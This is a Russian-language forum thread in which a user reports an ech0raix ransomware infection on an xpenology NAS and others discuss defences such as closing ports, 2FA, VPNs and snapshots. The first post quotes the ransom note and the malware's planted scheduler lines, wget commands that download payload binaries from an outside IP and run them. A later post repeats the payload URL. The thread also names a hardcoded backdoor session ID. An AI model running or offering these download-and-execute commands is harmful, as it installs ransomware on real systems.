Recommended Posts

Сегодня был заражен сервер с xpenology вот таким шифровальщиком ech0raix ransomware .

Успел заметить только через примерно 3 часа ,пошифровал  много ,расшифровщиков нет.

 Создает файлы с расширением encrypt  и такой текстовый файл README_FOR_DECRYPT.txtt

 

All your data has been locked(crypted).
How to unlock(decrypt) instruction located in this TOR website: http://veqlxhq7ub5qze3qy56zx2cig2e6tzsgxdspkubwbayqije6oatma6id.onion/order/1LujJPFKdyG6mX7ZcYw8zmLLR7ZXrCq2g4
Use TOR browser for access .onion websites.
https://duckduckgo.com/html?q=tor+browser+how+to

 

Из того что делал вчера только обновил torrserv на версию 106 ,может совпадение может нет.

Расшифровщик ключ подобрать не смог ,похоже какая то новая версия будьте внимательны.

Стояла DSM 6.2.3-25426 u3 включена защита от перебора паролей,но никаких алертов нет.

Пользователь admin был активен (сейчас уже нет ) .

 

Прописаны в планировщик еще такое

cd /tmp && wget --no-check-certificate -O arm http://174.62.79.238/1/crp_linux_arm;chmod 0777 ./arm;nohup ./arm --syno=true </dev/null >/dev/null 2>&1 &
cd /tmp && wget --no-check-certificate -O 386 http://174.62.79.238/1/crp_linux_386;chmod 0777 ./386;nohup ./386 --syno=true </dev/null >/dev/null 2>&1 &

 

Где еще что посмотреть кто подскажет ? Первый раз вирус на линуксе попал.

 

Upd. Добавлю порты ,которые смотрели наружу

 

 plex * 10000  32400 TCP

 dscloud * 5000  5000 TCP

 ds * 6690  6690 TCP

 dsphoto * 9999  9999 TCP

dsDrive * 5001  5001 TCP

 rtsp * 554  554 TCP

 DSPhoto * 1234  80 TCP

 Webdav_syno * 5005  5005 TCP

 Webdav_syno_https * 5006  5006 TCP

Edited by level001
Link to post
Share on other sites

https://xakep.ru/2021/08/10/new-ech0raix-2/  Как с этим бороться qnap патчи выпустил. 

Пока 5000 порт убрал из проброса ,правда есть вероятность что она по другому используется.

 

Synology и Qnap оставили дыру у себя ,скрытого пользователя под которым можно залогиниться

в любой момент ,и теперь эту дыру начали пользовать

       Атака пыталась использовать жестко запрограммированный идентификатор сеанса 'jisoosocoolhbsmgnt', чтобы обойти аутентификацию и выполнить команду на устройстве, чтобы получить вредоносное ПО с удаленного сервера .

https://unit42.paloaltonetworks.com/ech0raix-ransomware-soho/#:~:text=CVE-2021-28799%3A Exploit in the Wild&text=This software provides backup%2C restoration,log in to the devices

 

Так что наша любимая xpenology стала совсем небезопасной и обновлений на нее больше нет.

Edited by level001
Link to post
Share on other sites

Так они бэкдор для себя оставили ,теперь нас юзать будут,пока дыру не закроем.

Я пока не нашел файл с таким содержимым 'jisoosocoolhbsmgnt'

Возможно для синолоджи он другой.

Link to post
Share on other sites
On 9/17/2021 at 8:51 PM, level001 said:

Сегодня был заражен сервер с xpenology вот таким шифровальщиком ech0raix ransomware .

 

 

Сообщите пожалуйста, был ли изменен пароль учётки admin и отключена данная учётная запись как рекомендуют synology?

https://www.synology.com/en-global/company/news/article/2019JulyRansomware

 

Link to post
Share on other sites

Учетка admin была включена ,пароль изменен на стойкий. Перебор паролей запрещен с блокировкой на 10 минут. В логах никаких попыток перебора нет.

Edited by level001
Link to post
Share on other sites
2 часа назад, level001 сказал:

Учетка admin была включена ,пароль изменен на стойкий. Перебор паролей запрещен с блокировкой на 10 минут. В логах никаких попыток перебора нет.

 

Стойкий пароль это какой? 

 

- цифры ?

- буквы разного регистра ?

- спецсимволы ?

- длинна не менее 12 знаков?

- использовался только для этой учётки?

 

 

 

 

 

Link to post
Share on other sites

Да не подбирали его ,я же дал ссылку на уязвимость . Там сессия админская у них прописана как бэкдор для себя любимых.

Я дал ссылки выше по которым он восстанавливает вирус ,если вы его удалили .http://174.62.79.238/1/crp_linux_386

потом он его переименовывает в 386 дает права 777 и делает исполняемым и исполняет ,можете скачать и посмотреть он 4 мб . А дальше это уже надо в лаборатории Касперского работать ,чтобы дизассемблировать и понять что оно делает.

на ip 174.62.79.238 такая жертва ботнета только с QNAP можете зайти и полюбоваться на него. Ему ничего не шифровали ,а засунули загрузчик ,на который ссылку другим прописывают.

Edited by level001
Link to post
Share on other sites

Вчера то же почитал про него. Видимо действительно вирус прошел в систему через "задний проход"))

Но вы пишете что он, вирус, выключил учётку админа, полагаю чтобы закрыть калитку от шифровальщиков конкурентов.

У себя, выключил проброс портов в роутере, благо для меня это не критично, пользуюсь пока QC.

Понять бы какой порт использует шифровальщик. Ели только 5000 либо 5001 то вероятно, можно для веб морды настроить другие порты.

Или нет смысла, все равно переберут, как думаете?

И еще вопрос к level001, стоял ли у вас антивиус, есть ли от него вообще толк?

Edited by dr_End
Link to post
Share on other sites
В 19.09.2021 в 13:29, Olegin сказал:

И про это не забывайте...

323023510_.thumb.png.9557f93588c39853929eec497b287750.png

на сколько понимаю это работает только для входа в DSM по 5000-5001 портам

для ftp и для телнета\ssh никакие 2 фактора и не запрашиваются

Link to post
Share on other sites
4 часа назад, -iliya- сказал:

на сколько понимаю это работает только для входа в DSM по 5000-5001 портам

Да, в гуй, по тем портам какие выставите в настройках dsm и/или пробросите наружу.

4 часа назад, -iliya- сказал:

для ftp и для телнета\ssh никакие 2 фактора и не запрашиваются

Да, но это я только через випиэн... ну, на крайняк проксю поднять можно.

Link to post
Share on other sites
2 часа назад, Olegin сказал:

Да, но это я только через випиэн... ну, на крайняк проксю поднять можно.

ftp через VPN - это как то странно - мне например надо файлы людям раздавать, как я их всех через vpn переруливать буду?

 

Я вот пока подумываю что бы закрыть все порты, а открыть их через тот же win10 на VMM на котором поднять ftp через cerberus или filezillu

а для доступа к nas использовать уже openvpn поднятый виртуалке, через которую уже можно попасть на nas.

Link to post
Share on other sites
7 минут назад, -iliya- сказал:

Я вот пока подумываю что бы закрыть все порты, а открыть их через тот же win10 на VMM

Но тогда эта виртуалка будет слабым звеном. Может ftp через https проксю?

Link to post
Share on other sites
38 минут назад, Olegin сказал:

Но тогда эта виртуалка будет слабым звеном. Может ftp через https проксю?

не факт - на нее можно жестких антивирей посадить, да и сделать ее на любой enterptrise системе

через проксю это гемор и для меня и для клиентов - клиенты это люди которым слова прокси ftp и тд это как иероглифы,

да и скорость надо обеспечить максимальную.

Link to post
Share on other sites

Всем привет!

Странно, что сино в указанной выше статье не указывает в качестве защиты моментальные снимки. На 100% снимает риски потери данных из-за шифровальщиков. При этом, восстановление занимает считанные минуты.

У меня защита на 7 снимков, раз в сутки. Пусть шифруют на здоровье 😀

Edited by Drones
Link to post
Share on other sites
28 минут назад, Drones сказал:

Всем привет!

Странно, что сино в указанной выше статье не указывает в качестве защиты моментальные снимки. На 100% снимает риски потери данных из-за шифровальщиков. При этом, восстановление занимает считанные минуты.

У меня защита на 7 снимков, раз в сутки. Пусть шифруют на здоровье 😀

Часто слышал про снапшоты, но сам не пользовался. Много места дополнительно занимает?

Link to post
Share on other sites

ext4 не поддерживает снимки . А как на brtfs перейти быстро и без потерь -это вопрос. И нужно ли это,

потому что потом если что с brtfs хрен что вытащишь.

Link to post
Share on other sites
3 minutes ago, level001 said:

если что с brtfs хрен что вытащишь.

Ну, не совсем так. Проблемы больше создает сочетание массивов с btrfs, а не она сама. Тут каждый решает сам, что ему важнее: "плюшки" btrfs или более надежный вариант восстановления на внешнем ресурсе.

Edited by QwertRob
Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.